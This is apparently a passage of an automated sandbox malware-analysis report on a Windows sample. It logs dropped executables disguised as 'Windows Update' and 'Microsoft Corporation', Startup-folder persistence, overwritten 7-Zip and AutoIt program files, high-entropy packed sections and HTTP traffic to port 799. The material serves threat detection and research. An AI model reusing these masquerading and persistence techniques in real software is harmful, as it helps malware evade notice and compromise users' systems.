          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0062C756 push 0062C7C7h; ret 0_2_0062C7BF
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006357D8 push 00635838h; ret 0_2_00635830
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006228EA push 00622918h; ret 0_2_00622910
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006388C4 push ecx; mov dword ptr [esp], edx0_2_006388C9
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0062C8DA push 0062C908h; ret 0_2_0062C900
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00638880 push ecx; mov dword ptr [esp], edx0_2_00638885
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0063688C push 006368D9h; ret 0_2_006368D1
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0063496E push 006349EDh; ret 0_2_006349E5
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006339C0 push 00633A36h; ret 0_2_00633A2E
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_006229A8 push 006229D4h; ret 0_2_006229CC
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00633A38 push 00633AE0h; ret 0_2_00633AD8
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00633AE2 push 00633B30h; ret 0_2_00633B28
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00623AC8 push ecx; mov dword ptr [esp], eax0_2_00623AC9
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00635ABC push ecx; mov dword ptr [esp], ecx0_2_00635ABF
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00634C3C push 00634C68h; ret 0_2_00634C60
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00623D72 push 00623DA0h; ret 0_2_00623D98
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00635D2C push ecx; mov dword ptr [esp], ecx0_2_00635D2E
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0062BDDC push ecx; mov dword ptr [esp], edx0_2_0062BDE1
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00623DAC push 00623DD8h; ret 0_2_00623DD0
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_00623ED4 push 00623F00h; ret 0_2_00623EF8
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_0061EFD8 push eax; ret 0_2_0061F014
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name: entropy: 7.976487863015766
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name: .data entropy: 7.970274705878334
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name: du entropy: 6.934584666735054
          Source: server.exe.0.drStatic PE information: section name: entropy: 7.976487863015766
          Source: server.exe.0.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: server.exe.0.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: RRqyIX.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
          Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934446577355295
          Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934784069858757
          Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.933741776560137
          Source: Explower.exe.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe0.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe0.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe0.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe1.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe1.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe1.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe2.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe2.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe2.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe3.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe3.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe3.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe4.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe4.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe4.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe5.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe5.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe5.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe6.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe6.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe6.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe7.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe7.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe7.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Explower.exe8.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Explower.exe8.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Explower.exe8.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: system.exe.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: system.exe.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: system.exe.4.drStatic PE information: section name: du entropy: 6.934584666735054
          Source: Notepad.exe.4.drStatic PE information: section name: entropy: 7.976487863015766
          Source: Notepad.exe.4.drStatic PE information: section name: .data entropy: 7.970274705878334
          Source: Notepad.exe.4.drStatic PE information: section name: du entropy: 6.934584666735054

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\Documents\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile created: C:\Users\user\AppData\Local\Temp\RRqyIX.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\system.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exeJump to dropped file
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile created: C:\Users\user\AppData\Local\Temp\server.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Notepad.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\Documents\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\SysWOW64\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\Favorites\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Local\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\History\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Program Files (x86)\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\Desktop\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Program Files (x86)\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\SysWOW64\Explower.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
